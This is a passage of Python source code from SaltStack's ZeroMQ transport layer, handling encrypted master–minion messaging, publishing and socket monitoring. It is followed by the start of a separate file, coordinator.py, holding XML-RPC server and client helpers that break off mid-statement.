self.auth.get_keys() if "key" not in ret: # Reauth in the case our key is deleted on the master side. yield self.auth.authenticate() ret = yield self.message_client.send( self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout, tries=tries, ) if HAS_M2: aes = key.private_decrypt(ret["key"], RSA.pkcs1_oaep_padding) else: cipher = PKCS1_OAEP.new(key) aes = cipher.decrypt(ret["key"]) pcrypt = salt.crypt.Crypticle(self.opts, aes) data = pcrypt.loads(ret[dictkey]) data = salt.transport.frame.decode_embedded_strs(data) raise salt.ext.tornado.gen.Return(data) @salt.ext.tornado.gen.coroutine def _crypted_transfer(self, load, tries=3, timeout=60, raw=False): """ Send a load across the wire, with encryption In case of authentication errors, try to renegotiate authentication and retry the method. Indeed, we can fail too early in case of a master restart during a minion state execution call :param dict load: A load to send across the wire :param int tries: The number of times to make before failure :param int timeout: The number of seconds on a response before failing """ @salt.ext.tornado.gen.coroutine def _do_transfer(): # Yield control to the caller. When send() completes, resume by populating data with the Future.result data = yield self.message_client.send( self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout, tries=tries, ) # we may not have always data # as for example for saltcall ret submission, this is a blind # communication, we do not subscribe to return events, we just # upload the results to the master if data: data = self.auth.crypticle.loads(data, raw) if not raw: data = salt.transport.frame.decode_embedded_strs(data) raise salt.ext.tornado.gen.Return(data) if not self.auth.authenticated: # Return control back to the caller, resume when authentication succeeds yield self.auth.authenticate() try: # We did not get data back the first time. Retry. ret = yield _do_transfer() except salt.crypt.AuthenticationError: # If auth error, return control back to the caller, continue when authentication succeeds yield self.auth.authenticate() ret = yield _do_transfer() raise salt.ext.tornado.gen.Return(ret) @salt.ext.tornado.gen.coroutine def _uncrypted_transfer(self, load, tries=3, timeout=60): """ Send a load across the wire in cleartext :param dict load: A load to send across the wire :param int tries: The number of times to make before failure :param int timeout: The number of seconds on a response before failing """ ret = yield self.message_client.send( self._package_load(load), timeout=timeout, tries=tries, ) raise salt.ext.tornado.gen.Return(ret) @salt.ext.tornado.gen.coroutine def send(self, load, tries=3, timeout=60, raw=False): """ Send a request, return a future which will complete when we send the message """ if self.crypt == "clear": ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout) else: ret = yield self._crypted_transfer( load, tries=tries, timeout=timeout, raw=raw ) raise salt.ext.tornado.gen.Return(ret) class AsyncZeroMQPubChannel( salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel ): """ A transport channel backed by ZeroMQ for a Salt Publisher to use to publish commands to connected minions """ async_methods = [ "connect", "_decode_messages", ] close_methods = [ "close", ] def __init__(self, opts, **kwargs): self.opts = opts self.ttype = "zeromq" self.io_loop = kwargs.get("io_loop") self._closing = False if self.io_loop is None: self.io_loop = salt.ext.tornado.ioloop.IOLoop.current() self.hexid = hashlib.sha1( salt.utils.stringutils.to_bytes(self.opts["id"]) ).hexdigest() self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop) self.context = zmq.Context() self._socket = self.context.socket(zmq.SUB) if self.opts["zmq_filtering"]: # TODO: constants file for "broadcast" self._socket.setsockopt(zmq.SUBSCRIBE, b"broadcast") if self.opts.get("__role") == "syndic": self._socket.setsockopt(zmq.SUBSCRIBE, b"syndic") else: self._socket.setsockopt( zmq.SUBSCRIBE, salt.utils.stringutils.to_bytes(self.hexid) ) else: self._socket.setsockopt(zmq.SUBSCRIBE, b"") self._socket.setsockopt( zmq.IDENTITY, salt.utils.stringutils.to_bytes(self.opts["id"]) ) # TODO: cleanup all the socket opts stuff if hasattr(zmq, "TCP_KEEPALIVE"): self._socket.setsockopt(zmq.TCP_KEEPALIVE, self.opts["tcp_keepalive"]) self._socket.setsockopt( zmq.TCP_KEEPALIVE_IDLE, self.opts["tcp_keepalive_idle"] ) self._socket.setsockopt( zmq.TCP_KEEPALIVE_CNT, self.opts["tcp_keepalive_cnt"] ) self._socket.setsockopt( zmq.TCP_KEEPALIVE_INTVL, self.opts["tcp_keepalive_intvl"] ) recon_delay = self.opts["recon_default"] if self.opts["recon_randomize"]: recon_delay = randint( self.opts["recon_default"], self.opts["recon_default"] + self.opts["recon_max"], ) log.debug( "Generated random reconnect delay between '%sms' and '%sms' (%s)", self.opts["recon_default"], self.opts["recon_default"] + self.opts["recon_max"], recon_delay, ) log.debug("Setting zmq_reconnect_ivl to '%sms'", recon_delay) self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay) if hasattr(zmq, "RECONNECT_IVL_MAX"): log.debug( "Setting zmq_reconnect_ivl_max to '%sms'", self.opts["recon_default"] + self.opts["recon_max"], ) self._socket.setsockopt(zmq.RECONNECT_IVL_MAX, self.opts["recon_max"]) if (self.opts["ipv6"] is True or ":" in self.opts["master_ip"]) and hasattr( zmq, "IPV4ONLY" ): # IPv6 sockets work for both IPv6 and IPv4 addresses self._socket.setsockopt(zmq.IPV4ONLY, 0) if HAS_ZMQ_MONITOR and self.opts["zmq_monitor"]: self._monitor = ZeroMQSocketMonitor(self._socket) self._monitor.start_io_loop(self.io_loop) def close(self): if self._closing is True: return self._closing = True if hasattr(self, "_monitor") and self._monitor is not None: self._monitor.stop() self._monitor = None if hasattr(self, "_stream"): self._stream.close(0) elif hasattr(self, "_socket"): self._socket.close(0) if hasattr(self, "context") and self.context.closed is False: self.context.term() # pylint: disable=W1701 def __del__(self): self.close() # pylint: enable=W1701 def __enter__(self): return self def __exit__(self, *args): self.close() # TODO: this is the time to see if we are connected, maybe use the req channel to guess? @salt.ext.tornado.gen.coroutine def connect(self): if not self.auth.authenticated: yield self.auth.authenticate() # if this is changed from the default, we assume it was intentional if int(self.opts.get("publish_port", 4506)) != 4506: self.publish_port = self.opts.get("publish_port") # else take the relayed publish_port master reports else: self.publish_port = self.auth.creds["publish_port"] log.debug( "Connecting the Minion to the Master publish port, using the URI: %s", self.master_pub, ) self._socket.connect(self.master_pub) @property def master_pub(self): """ Return the master publish port """ return _get_master_uri( self.opts["master_ip"], self.publish_port, source_ip=self.opts.get("source_ip"), source_port=self.opts.get("source_publish_port"), ) @salt.ext.tornado.gen.coroutine def _decode_messages(self, messages): """ Take the zmq messages, decrypt/decode them into a payload :param list messages: A list of messages to be decoded """ messages_len = len(messages) # if it was one message, then its old style if messages_len == 1: payload = salt.payload.loads(messages[0]) # 2 includes a header which says who should do it elif messages_len == 2: message_target = salt.utils.stringutils.to_str(messages[0]) if ( self.opts.get("__role") != "syndic" and message_target not in ("broadcast", self.hexid) ) or ( self.opts.get("__role") == "syndic" and message_target not in ("broadcast", "syndic") ): log.debug("Publish received for not this minion: %s", message_target) raise salt.ext.tornado.gen.Return(None) payload = salt.payload.loads(messages[1]) else: raise Exception( "Invalid number of messages ({}) in zeromq pubmessage from master".format( len(messages_len) ) ) # Yield control back to the caller. When the payload has been decoded, assign # the decoded payload to 'ret' and resume operation ret = yield self._decode_payload(payload) raise salt.ext.tornado.gen.Return(ret) @property def stream(self): """ Return the current zmqstream, creating one if necessary """ if not hasattr(self, "_stream"): self._stream = zmq.eventloop.zmqstream.ZMQStream( self._socket, io_loop=self.io_loop ) return self._stream def on_recv(self, callback): """ Register a callback for received messages (that we didn't initiate) :param func callback: A function which should be called when data is received """ if callback is None: return self.stream.on_recv(None) @salt.ext.tornado.gen.coroutine def wrap_callback(messages): payload = yield self._decode_messages(messages) if payload is not None: callback(payload) return self.stream.on_recv(wrap_callback) class ZeroMQReqServerChannel( salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel ): def __init__(self, opts): salt.transport.server.ReqServerChannel.__init__(self, opts) self._closing = False self._monitor = None self._w_monitor = None def zmq_device(self): """ Multiprocessing target for the zmq queue device """ self.__setup_signals() self.context = zmq.Context(self.opts["worker_threads"]) # Prepare the zeromq sockets self.uri = "tcp://{interface}:{ret_port}".format(**self.opts) self.clients = self.context.socket(zmq.ROUTER) if self.opts["ipv6"] is True and hasattr(zmq, "IPV4ONLY"): # IPv6 sockets work for both IPv6 and IPv4 addresses self.clients.setsockopt(zmq.IPV4ONLY, 0) self.clients.setsockopt(zmq.BACKLOG, self.opts.get("zmq_backlog", 1000)) self._start_zmq_monitor() self.workers = self.context.socket(zmq.DEALER) if self.opts["mworker_queue_niceness"] and not salt.utils.platform.is_windows(): log.info( "setting mworker_queue niceness to %d", self.opts["mworker_queue_niceness"], ) os.nice(self.opts["mworker_queue_niceness"]) if self.opts.get("ipc_mode", "") == "tcp": self.w_uri = "tcp://127.0.0.1:{}".format( self.opts.get("tcp_master_workers", 4515) ) else: self.w_uri = "ipc://{}".format( os.path.join(self.opts["sock_dir"], "workers.ipc") ) log.info("Setting up the master communication server") self.clients.bind(self.uri) self.workers.bind(self.w_uri) while True: if self.clients.closed or self.workers.closed: break try: zmq.device(zmq.QUEUE, self.clients, self.workers) except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise except (KeyboardInterrupt, SystemExit): break def close(self): """ Cleanly shutdown the router socket """ if self._closing: return log.info("MWorkerQueue under PID %s is closing", os.getpid()) self._closing = True if getattr(self, "_monitor", None) is not None: self._monitor.stop() self._monitor = None if getattr(self, "_w_monitor", None) is not None: self._w_monitor.stop() self._w_monitor = None if hasattr(self, "clients") and self.clients.closed is False: self.clients.close() if hasattr(self, "workers") and self.workers.closed is False: self.workers.close() if hasattr(self, "stream"): self.stream.close() if hasattr(self, "_socket") and self._socket.closed is False: self._socket.close() if hasattr(self, "context") and self.context.closed is False: self.context.term() def pre_fork(self, process_manager): """ Pre-fork we need to create the zmq router device :param func process_manager: An instance of salt.utils.process.ProcessManager """ salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager) process_manager.add_process(self.zmq_device, name="MWorkerQueue") def _start_zmq_monitor(self): """ Starts ZMQ monitor for debugging purposes. :return: """ # Socket monitor shall be used the only for debug # purposes so using threading doesn't look too bad here if HAS_ZMQ_MONITOR and self.opts["zmq_monitor"]: log.debug("Starting ZMQ monitor") import threading self._w_monitor = ZeroMQSocketMonitor(self._socket) threading.Thread(target=self._w_monitor.start_poll).start() log.debug("ZMQ monitor has been started started") def post_fork(self, payload_handler, io_loop): """ After forking we need to create all of the local sockets to listen to the router :param func payload_handler: A function to called to handle incoming payloads as they are picked up off the wire :param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling """ self.payload_handler = payload_handler self.io_loop = io_loop self.context = zmq.Context(1) self._socket = self.context.socket(zmq.REP) self._start_zmq_monitor() if self.opts.get("ipc_mode", "") == "tcp": self.w_uri = "tcp://127.0.0.1:{}".format( self.opts.get("tcp_master_workers", 4515) ) else: self.w_uri = "ipc://{}".format( os.path.join(self.opts["sock_dir"], "workers.ipc") ) log.info("Worker binding to socket %s", self.w_uri) self._socket.connect(self.w_uri) salt.transport.mixins.auth.AESReqServerMixin.post_fork( self, payload_handler, io_loop ) self.stream = zmq.eventloop.zmqstream.ZMQStream( self._socket, io_loop=self.io_loop ) self.stream.on_recv_stream(self.handle_message) @salt.ext.tornado.gen.coroutine def handle_message(self, stream, payload): """ Handle incoming messages from underlying TCP streams :stream ZMQStream stream: A ZeroMQ stream. See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html :param dict payload: A payload to process """ try: payload = salt.payload.loads(payload[0]) payload = self._decode_payload(payload) except Exception as exc: # pylint: disable=broad-except exc_type = type(exc).__name__ if exc_type == "AuthenticationError": log.debug( "Minion failed to auth to master. Since the payload is " "encrypted, it is not known which minion failed to " "authenticate. It is likely that this is a transient " "failure due to the master rotating its public key." ) else: log.error("Bad load from minion: %s: %s", exc_type, exc) stream.send(salt.payload.dumps("bad load")) raise salt.ext.tornado.gen.Return() # TODO helper functions to normalize payload? if not isinstance(payload, dict) or not isinstance(payload.get("load"), dict): log.error( "payload and load must be a dict. Payload was: %s and load was %s", payload, payload.get("load"), ) stream.send(salt.payload.dumps("payload and load must be a dict")) raise salt.ext.tornado.gen.Return() try: id_ = payload["load"].get("id", "") if "\0" in id_: log.error("Payload contains an id with a null byte: %s", payload) stream.send(salt.payload.dumps("bad load: id contains a null byte")) raise salt.ext.tornado.gen.Return() except TypeError: log.error("Payload contains non-string id: %s", payload) stream.send( salt.payload.dumps("bad load: id {} is not a string".format(id_)) ) raise salt.ext.tornado.gen.Return() # intercept the "_auth" commands, since the main daemon shouldn't know # anything about our key auth if payload["enc"] == "clear" and payload.get("load", {}).get("cmd") == "_auth": stream.send(salt.payload.dumps(self._auth(payload["load"]))) raise salt.ext.tornado.gen.Return() # TODO: test try: # Take the payload_handler function that was registered when we created the channel # and call it, returning control to the caller until it completes ret, req_opts = yield self.payload_handler(payload) except Exception as e: # pylint: disable=broad-except # always attempt to return an error to the minion stream.send("Some exception handling minion payload") log.error("Some exception handling a payload from minion", exc_info=True) raise salt.ext.tornado.gen.Return() req_fun = req_opts.get("fun", "send") if req_fun == "send_clear": stream.send(salt.payload.dumps(ret)) elif req_fun == "send": stream.send(salt.payload.dumps(self.crypticle.dumps(ret))) elif req_fun == "send_private": stream.send( salt.payload.dumps( self._encrypt_private( ret, req_opts["key"], req_opts["tgt"], ) ) ) else: log.error("Unknown req_fun %s", req_fun) # always attempt to return an error to the minion stream.send("Server-side exception handling payload") raise salt.ext.tornado.gen.Return() def __setup_signals(self): signal.signal(signal.SIGINT, self._handle_signals) signal.signal(signal.SIGTERM, self._handle_signals) def _handle_signals(self, signum, sigframe): msg = "{} received a ".format(self.__class__.__name__) if signum == signal.SIGINT: msg += "SIGINT" elif signum == signal.SIGTERM: msg += "SIGTERM" msg += ". Exiting" log.debug(msg) self.close() sys.exit(salt.defaults.exitcodes.EX_OK) def _set_tcp_keepalive(zmq_socket, opts): """ Ensure that TCP keepalives are set as specified in "opts". Warning: Failure to set TCP keepalives on the salt-master can result in not detecting the loss of a minion when the connection is lost or when its host has been terminated without first closing the socket. Salt's Presence System depends on this connection status to know if a minion is "present". Warning: Failure to set TCP keepalives on minions can result in frequent or unexpected disconnects! """ if hasattr(zmq, "TCP_KEEPALIVE") and opts: if "tcp_keepalive" in opts: zmq_socket.setsockopt(zmq.TCP_KEEPALIVE, opts["tcp_keepalive"]) if "tcp_keepalive_idle" in opts: zmq_socket.setsockopt(zmq.TCP_KEEPALIVE_IDLE, opts["tcp_keepalive_idle"]) if "tcp_keepalive_cnt" in opts: zmq_socket.setsockopt(zmq.TCP_KEEPALIVE_CNT, opts["tcp_keepalive_cnt"]) if "tcp_keepalive_intvl" in opts: zmq_socket.setsockopt(zmq.TCP_KEEPALIVE_INTVL, opts["tcp_keepalive_intvl"]) class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel): """ Encapsulate synchronous operations for a publisher channel """ _sock_data = threading.local() def __init__(self, opts): self.opts = opts self.ckminions = salt.utils.minions.CkMinions(self.opts) def connect(self): return salt.ext.tornado.gen.sleep(5) def _publish_daemon(self, log_queue=None): """ Bind to the interface specified in the configuration file """ if self.opts["pub_server_niceness"] and not salt.utils.platform.is_windows(): log.info( "setting Publish daemon niceness to %i", self.opts["pub_server_niceness"], ) os.nice(self.opts["pub_server_niceness"]) if log_queue: salt.log.setup.set_multiprocessing_logging_queue(log_queue) salt.log.setup.setup_multiprocessing_logging(log_queue) # Set up the context context = zmq.Context(1) # Prepare minion publish socket pub_sock = context.socket(zmq.PUB) _set_tcp_keepalive(pub_sock, self.opts) # if 2.1 >= zmq < 3.0, we only have one HWM setting try: pub_sock.setsockopt(zmq.HWM, self.opts.get("pub_hwm", 1000)) # in zmq >= 3.0, there are separate send and receive HWM settings except AttributeError: # Set the High Water Marks. For more information on HWM, see: # http://api.zeromq.org/4-1:zmq-setsockopt pub_sock.setsockopt(zmq.SNDHWM, self.opts.get("pub_hwm", 1000)) pub_sock.setsockopt(zmq.RCVHWM, self.opts.get("pub_hwm", 1000)) if self.opts["ipv6"] is True and hasattr(zmq, "IPV4ONLY"): # IPv6 sockets work for both IPv6 and IPv4 addresses pub_sock.setsockopt(zmq.IPV4ONLY, 0) pub_sock.setsockopt(zmq.BACKLOG, self.opts.get("zmq_backlog", 1000)) pub_sock.setsockopt(zmq.LINGER, -1) pub_uri = "tcp://{interface}:{publish_port}".format(**self.opts) # Prepare minion pull socket pull_sock = context.socket(zmq.PULL) pull_sock.setsockopt(zmq.LINGER, -1) if self.opts.get("ipc_mode", "") == "tcp": pull_uri = "tcp://127.0.0.1:{}".format( self.opts.get("tcp_master_publish_pull", 4514) ) else: pull_uri = "ipc://{}".format( os.path.join(self.opts["sock_dir"], "publish_pull.ipc") ) salt.utils.zeromq.check_ipc_path_max_len(pull_uri) # Start the minion command publisher log.info("Starting the Salt Publisher on %s", pub_uri) pub_sock.bind(pub_uri) # Securely create socket log.info("Starting the Salt Puller on %s", pull_uri) with salt.utils.files.set_umask(0o177): pull_sock.bind(pull_uri) try: while True: # Catch and handle EINTR from when this process is sent # SIGUSR1 gracefully so we don't choke and die horribly try: log.debug("Publish daemon getting data from puller %s", pull_uri) package = pull_sock.recv() log.debug("Publish daemon received payload. size=%d", len(package)) unpacked_package = salt.payload.unpackage(package) unpacked_package = salt.transport.frame.decode_embedded_strs( unpacked_package ) payload = unpacked_package["payload"] log.trace("Accepted unpacked package from puller") if self.opts["zmq_filtering"]: # if you have a specific topic list, use that if "topic_lst" in unpacked_package: for topic in unpacked_package["topic_lst"]: log.trace( "Sending filtered data over publisher %s", pub_uri ) # zmq filters are substring match, hash the topic # to avoid collisions htopic = salt.utils.stringutils.to_bytes( hashlib.sha1( salt.utils.stringutils.to_bytes(topic) ).hexdigest() ) pub_sock.send(htopic, flags=zmq.SNDMORE) pub_sock.send(payload) log.trace("Filtered data has been sent") # Syndic broadcast if self.opts.get("order_masters"): log.trace("Sending filtered data to syndic") pub_sock.send(b"syndic", flags=zmq.SNDMORE) pub_sock.send(payload) log.trace("Filtered data has been sent to syndic") # otherwise its a broadcast else: # TODO: constants file for "broadcast" log.trace( "Sending broadcasted data over publisher %s", pub_uri ) pub_sock.send(b"broadcast", flags=zmq.SNDMORE) pub_sock.send(payload) log.trace("Broadcasted data has been sent") else: log.trace( "Sending ZMQ-unfiltered data over publisher %s", pub_uri ) pub_sock.send(payload) log.trace("Unfiltered data has been sent") except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise except KeyboardInterrupt: log.trace("Publish daemon caught Keyboard interupt, tearing down") # Cleanly close the sockets if we're shutting down if pub_sock.closed is False: pub_sock.close() if pull_sock.closed is False: pull_sock.close() if context.closed is False: context.term() def pre_fork(self, process_manager, kwargs=None): """ Do anything necessary pre-fork. Since this is on the master side this will primarily be used to create IPC channels and create our daemon process to do the actual publishing :param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager """ process_manager.add_process( self._publish_daemon, kwargs=kwargs, name=self.__class__.__name__ ) @property def pub_sock(self): """ This thread's zmq publisher socket. This socket is stored on the class so that multiple instantiations in the same thread will re-use a single zmq socket. """ try: return self._sock_data.sock except AttributeError: pass def pub_connect(self): """ Create and connect this thread's zmq socket. If a publisher socket already exists "pub_close" is called before creating and connecting a new socket. """ if self.pub_sock: self.pub_close() ctx = zmq.Context.instance() self._sock_data.sock = ctx.socket(zmq.PUSH) self.pub_sock.setsockopt(zmq.LINGER, -1) if self.opts.get("ipc_mode", "") == "tcp": pull_uri = "tcp://127.0.0.1:{}".format( self.opts.get("tcp_master_publish_pull", 4514) ) else: pull_uri = "ipc://{}".format( os.path.join(self.opts["sock_dir"], "publish_pull.ipc") ) log.debug("Connecting to pub server: %s", pull_uri) self.pub_sock.connect(pull_uri) return self._sock_data.sock def pub_close(self): """ Disconnect an existing publisher socket and remove it from the local thread's cache. """ if hasattr(self._sock_data, "sock"): self._sock_data.sock.close() delattr(self._sock_data, "sock") def publish(self, load): """ Publish "load" to minions. This send the load to the publisher daemon process with does the actual sending to minions. :param dict load: A load to be sent across the wire to minions """ payload = {"enc": "aes"} crypticle = salt.crypt.Crypticle( self.opts, salt.master.SMaster.secrets["aes"]["secret"].value ) payload["load"] = crypticle.dumps(load) if self.opts["sign_pub_messages"]: master_pem_path = os.path.join(self.opts["pki_dir"], "master.pem") log.debug("Signing data packet") payload["sig"] = salt.crypt.sign_message(master_pem_path, payload["load"]) int_payload = {"payload": salt.payload.dumps(payload)} # add some targeting stuff for lists only (for now) if load["tgt_type"] == "list": int_payload["topic_lst"] = load["tgt"] # If zmq_filtering is enabled, target matching has to happen master side match_targets = ["pcre", "glob", "list"] if self.opts["zmq_filtering"] and load["tgt_type"] in match_targets: # Fetch a list of minions that match _res = self.ckminions.check_minions(load["tgt"], tgt_type=load["tgt_type"]) match_ids = _res["minions"] log.debug("Publish Side Match: %s", match_ids) # Send list of miions thru so zmq can target them int_payload["topic_lst"] = match_ids payload = salt.payload.dumps(int_payload) log.debug( "Sending payload to publish daemon. jid=%s size=%d", load.get("jid", None), len(payload), ) if not self.pub_sock: self.pub_connect() self.pub_sock.send(payload) log.debug("Sent payload to publish daemon.") class AsyncReqMessageClientPool(salt.transport.MessageClientPool): """ Wrapper class of AsyncReqMessageClientPool to avoid blocking waiting while writing data to socket. """ def __init__(self, opts, args=None, kwargs=None): self._closing = False super().__init__(AsyncReqMessageClient, opts, args=args, kwargs=kwargs) def close(self): if self._closing: return self._closing = True for message_client in self.message_clients: message_client.close() self.message_clients = [] def send(self, *args, **kwargs): message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue)) return message_clients[0].send(*args, **kwargs) def __enter__(self): return self def __exit__(self, *args): self.close() # TODO: unit tests! class AsyncReqMessageClient: """ This class wraps the underlying zeromq REQ socket and gives a future-based interface to sending and recieving messages. This works around the primary limitation of serialized send/recv on the underlying socket by queueing the message sends in this class. In the future if we decide to attempt to multiplex we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial """ def __init__(self, opts, addr, linger=0, io_loop=None): """ Create an asynchronous message client :param dict opts: The salt opts dictionary :param str addr: The interface IP address to bind to :param int linger: The number of seconds to linger on a ZMQ socket. See http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER] :param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop] """ self.opts = opts self.addr = addr self.linger = linger if io_loop is None: self.io_loop = salt.ext.tornado.ioloop.IOLoop.current() else: self.io_loop = io_loop self.context = zmq.Context() # wire up sockets self._init_socket() self.send_queue = [] # mapping of message -> future self.send_future_map = {} self.send_timeout_map = {} # message -> timeout self._closing = False # TODO: timeout all in-flight sessions, or error def close(self): try: if self._closing: return except AttributeError: # We must have been called from __del__ # The python interpreter has nuked most attributes already return else: self._closing = True if hasattr(self, "stream") and self.stream is not None: if ZMQ_VERSION_INFO < (14, 3, 0): # stream.close() doesn't work properly on pyzmq < 14.3.0 if self.stream.socket: self.stream.socket.close() self.stream.io_loop.remove_handler(self.stream.socket) # set this to None, more hacks for messed up pyzmq self.stream.socket = None self.socket.close() else: self.stream.close() self.socket = None self.stream = None if self.context.closed is False: self.context.term() # pylint: disable=W1701 def __del__(self): self.close() # pylint: enable=W1701 def _init_socket(self): if hasattr(self, "stream"): self.stream.close() # pylint: disable=E0203 self.socket.close() # pylint: disable=E0203 del self.stream del self.socket self.socket = self.context.socket(zmq.REQ) # socket options if hasattr(zmq, "RECONNECT_IVL_MAX"): self.socket.setsockopt(zmq.RECONNECT_IVL_MAX, 5000) _set_tcp_keepalive(self.socket, self.opts) if self.addr.startswith("tcp://["): # Hint PF type if bracket enclosed IPv6 address if hasattr(zmq, "IPV6"): self.socket.setsockopt(zmq.IPV6, 1) elif hasattr(zmq, "IPV4ONLY"): self.socket.setsockopt(zmq.IPV4ONLY, 0) self.socket.linger = self.linger log.debug("Trying to connect to: %s", self.addr) self.socket.connect(self.addr) self.stream = zmq.eventloop.zmqstream.ZMQStream( self.socket, io_loop=self.io_loop ) @salt.ext.tornado.gen.coroutine def _internal_send_recv(self): while len(self.send_queue) > 0: message = self.send_queue[0] future = self.send_future_map.get(message, None) if future is None: # Timedout del self.send_queue[0] continue # send def mark_future(msg): if not future.done(): data = salt.payload.loads(msg[0]) future.set_result(data) self.stream.on_recv(mark_future) self.stream.send(message) try: ret = yield future except Exception as err: # pylint: disable=broad-except log.debug("Re-init ZMQ socket: %s", err) self._init_socket() # re-init the zmq socket (no other way in zmq) del self.send_queue[0] continue del self.send_queue[0] self.send_future_map.pop(message, None) self.remove_message_timeout(message) def remove_message_timeout(self, message): if message not in self.send_timeout_map: return timeout = self.send_timeout_map.pop(message, None) if timeout is not None: # Hasn't been already timedout self.io_loop.remove_timeout(timeout) def timeout_message(self, message): """ Handle a message timeout by removing it from the sending queue and informing the caller :raises: SaltReqTimeoutError """ future = self.send_future_map.pop(message, None) # In a race condition the message might have been sent by the time # we're timing it out. Make sure the future is not None if future is not None: del self.send_timeout_map[message] if future.attempts < future.tries: future.attempts += 1 log.debug( "SaltReqTimeoutError, retrying. (%s/%s)", future.attempts, future.tries, ) self.send( message, timeout=future.timeout, tries=future.tries, future=future, ) else: future.set_exception(SaltReqTimeoutError("Message timed out")) def send( self, message, timeout=None, tries=3, future=None, callback=None, raw=False ): """ Return a future which will be completed when the message has a response """ if future is None: future = salt.ext.tornado.concurrent.Future() future.tries = tries future.attempts = 0 future.timeout = timeout # if a future wasn't passed in, we need to serialize the message message = salt.payload.dumps(message) if callback is not None: def handle_future(future): response = future.result() self.io_loop.add_callback(callback, response) future.add_done_callback(handle_future) # Add this future to the mapping self.send_future_map[message] = future if self.opts.get("detect_mode") is True: timeout = 1 if timeout is not None: send_timeout = self.io_loop.call_later( timeout, self.timeout_message, message ) self.send_timeout_map[message] = send_timeout if len(self.send_queue) == 0: self.io_loop.spawn_callback(self._internal_send_recv) self.send_queue.append(message) return future class ZeroMQSocketMonitor: __EVENT_MAP = None def __init__(self, socket): """ Create ZMQ monitor sockets More information: http://api.zeromq.org/4-0:zmq-socket-monitor """ self._socket = socket self._monitor_socket = self._socket.get_monitor_socket() self._monitor_stream = None def start_io_loop(self, io_loop): log.trace("Event monitor start!") self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream( self._monitor_socket, io_loop=io_loop ) self._monitor_stream.on_recv(self.monitor_callback) def start_poll(self): log.trace("Event monitor start!") try: while self._monitor_socket is not None and self._monitor_socket.poll(): msg = self._monitor_socket.recv_multipart() self.monitor_callback(msg) except (AttributeError, zmq.error.ContextTerminated): # We cannot log here because we'll get an interrupted system call in trying # to flush the logging buffer as we terminate pass @property def event_map(self): if ZeroMQSocketMonitor.__EVENT_MAP is None: event_map = {} for name in dir(zmq): if name.startswith("EVENT_"): value = getattr(zmq, name) event_map[value] = name ZeroMQSocketMonitor.__EVENT_MAP = event_map return ZeroMQSocketMonitor.__EVENT_MAP def monitor_callback(self, msg): evt = zmq.utils.monitor.parse_monitor_message(msg) evt["description"] = self.event_map[evt["event"]] log.debug("ZeroMQ event: %s", evt) if evt["event"] == zmq.EVENT_MONITOR_STOPPED: self.stop() def stop(self): if self._socket is None: return self._socket.disable_monitor() self._socket = None self._monitor_socket = None if self._monitor_stream is not None: self._monitor_stream.close() self._monitor_stream = None log.trace("Event monitor done!")
coordinator.py
from __future__ import generators import os import time import thread import sys import xmlrpclib import traceback from SimpleXMLRPCServer import SimpleXMLRPCServer import socket import dbfile import logging def get_hostname(host=None): 'get FQDN for host, or current host if not specified' if host is None: host=socket.gethostname() try: return socket.gethostbyaddr(host)[0] except socket.herror: # DNS CAN'T RESOLVE HOSTNAME return host # JUST USE HOSTNAME AS REPORTED BY gethostname() def get_server(host, port, logRequests=False): """Start xmlrpc server on requested host:port. Return bound SimpleXMLRPCServer server obj and port it's bound to. Set port=0 to bind to a random port number. """ if host is None: # use localhost as default host='localhost' server = SimpleXMLRPCServer((host, port), logRequests=logRequests) port = server.socket.getsockname()[1] logging.info("Running XMLRPC server on port %d..." % port) return server, port class XMLRPCClientObject(object): 'provides object proxy for remote object, with methods that mirror its xmlrpc_methods' def __init__(self,server,name,methodDict): self.name=name self.server=server import new class methodcall(object): def __init__(self,name): self.name=name def __call__(self,obj,*args): return obj.server.server.methodCall(obj.name,self.name,args) for methodName in methodDict: # CREATE METHODS TO ACCESS REMOTE OBJECT'S METHODS setattr(self,methodName,new.instancemethod(methodcall(methodName),self,self.__class__)) class XMLRPCClient(dict): 'interface to XMLRPC server serving multiple named objects' def __init__(self,url): self.server=xmlrpclib.ServerProxy(url) def __getitem__(self,name): 'get connection to the named server object' try: return dict.__getitem__(self,name) except KeyError: methodDict=self.server.objectInfo(name) # GET INFO ABOUT REQUESTED OBJECT import types if isinstance(methodDict,types.StringType): raise KeyError(methodDict) # RETURNED VALUE IS ERROR MESSAGE! v=XMLRPCClientObject(self,name,methodDict) self[name]=v # SAVE THIS OBJECT INTO OUR DICTIONARY return v class ConnectionDict(dict): 'ensure that multiple requests for the same connection use same ServerProxy' def __call__(self,url,name): try: s=self[url] # REUSE EXISTING CONNECTION TO THE SERVER except KeyError: s=XMLRPCClient(url) # GET NEW CONNECTION TO THE SERVER self[url]=s # CACHE THIS CONNECTION return s[name] # GET THE REQUESTED OBJECT PROXY FROM THE SERVER get_connection=ConnectionDict() # THIS RETURNS SAME ServerProxy FOR SAME url def safe_dispatch(self,name,args): """restrict calls to selected methods, and trap all exceptions to keep server alive!""" import datetime if name in self.xmlrpc_methods: # MAKE SURE THIS METHOD IS EXPLICITLY ALLOWED try: # TRAP ALL ERRORS TO PREVENT OUR SERVER FROM DYING print >>sys.stderr,'XMLRPC:',name,args,\ datetime.datetime.now().isoformat(' ') # LOG THE REQUEST if self.xmlrpc_methods[name]: # use this as an alias for method m = getattr(self,self.xmlrpc_methods[name]) else: # use method name as usual m = getattr(self,name) # GET THE BOUND METHOD val=m(*args) # CALL THE METHOD sys.stderr.flush() # FLUSH ANY OUTPUT TO OUR LOG return val # HAND BACK ITS RETURN VALUE except 